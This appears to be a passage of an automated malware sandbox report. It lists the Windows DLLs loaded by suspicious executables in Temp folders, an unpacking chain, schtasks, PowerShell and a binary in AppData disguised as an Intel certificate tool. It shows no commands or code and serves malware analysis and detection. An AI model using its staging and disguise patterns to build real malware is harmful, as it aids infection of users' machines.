                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: mstask.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: dui70.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: duser.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: chartv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: oleacc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: atlthunk.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: textinputframework.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: coreuicomponents.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: wtsapi32.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: winsta.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: textshaping.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: explorerframe.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1011459001\0d47c4c34f.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: edputil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: wintypes.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: appresolver.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: bcp47langs.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: slc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: sppc.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\1013561001\C1J7SVw.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: edgegdi.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: winmm.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                        Source: C:\Windows\System32\cmd.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\System32\mode.comSection loaded: ulib.dll
                        Source: C:\Windows\System32\mode.comSection loaded: ureg.dll
                        Source: C:\Windows\System32\mode.comSection loaded: edgegdi.dll
                        Source: C:\Windows\System32\mode.comSection loaded: fsutilext.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: webio.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ncrypt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ncryptsslp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: gpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: wbemcomn.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: amsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: userenv.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: version.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014060001\b1dc05533c.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\7z.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\main\in.exeSection loaded: ntmarta.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: ulib.dll
                        Source: C:\Windows\System32\attrib.exeSection loaded: fsutilext.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: winnsi.dll
                        Source: C:\Windows\System32\PING.EXESection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Roaming\Intel_PTT_EK_Recertification.exeSection loaded: edgegdi.dll
                        Source: C:\Windows\explorer.exeSection loaded: iphlpapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: userenv.dll
                        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dll
                        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dll
                        Source: C:\Windows\explorer.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\explorer.exeSection loaded: edgegdi.dll
                        Source: C:\Windows\explorer.exeSection loaded: wininet.dll
                        Source: C:\Windows\explorer.exeSection loaded: powrprof.dll
                        Source: C:\Windows\explorer.exeSection loaded: umpdc.dll
                        Source: C:\Windows\explorer.exeSection loaded: uxtheme.dll
                        Source: C:\Windows\explorer.exeSection loaded: mswsock.dll
                        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc6.dll
                        Source: C:\Windows\explorer.exeSection loaded: dhcpcsvc.dll
                        Source: C:\Windows\explorer.exeSection loaded: dnsapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: napinsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: pnrpnsp.dll
                        Source: C:\Windows\explorer.exeSection loaded: wshbth.dll
                        Source: C:\Windows\explorer.exeSection loaded: nlaapi.dll
                        Source: C:\Windows\explorer.exeSection loaded: winrnr.dll
                        Source: C:\Windows\explorer.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\explorer.exeSection loaded: explorerframe.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: xmllite.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: apphelp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netapi32.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wininet.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: samcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: netutils.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: edgegdi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: kernel.appcore.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: taskschd.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: sspicli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: xmllite.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iertutil.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: windows.storage.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: wldp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: profapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ondemandconnroutehelper.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winhttp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: iphlpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mswsock.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: winnsi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: urlmon.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: srvcli.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dnsapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rasadhlp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: fwpuclnt.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: schannel.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: mskeyprotect.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: ntasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: msasn1.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: dpapi.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptsp.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: rsaenh.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: cryptbase.dll
                        Source: C:\Users\user\AppData\Local\Temp\1014430001\dwVrTdy.exeSection loaded: gpapi.dll
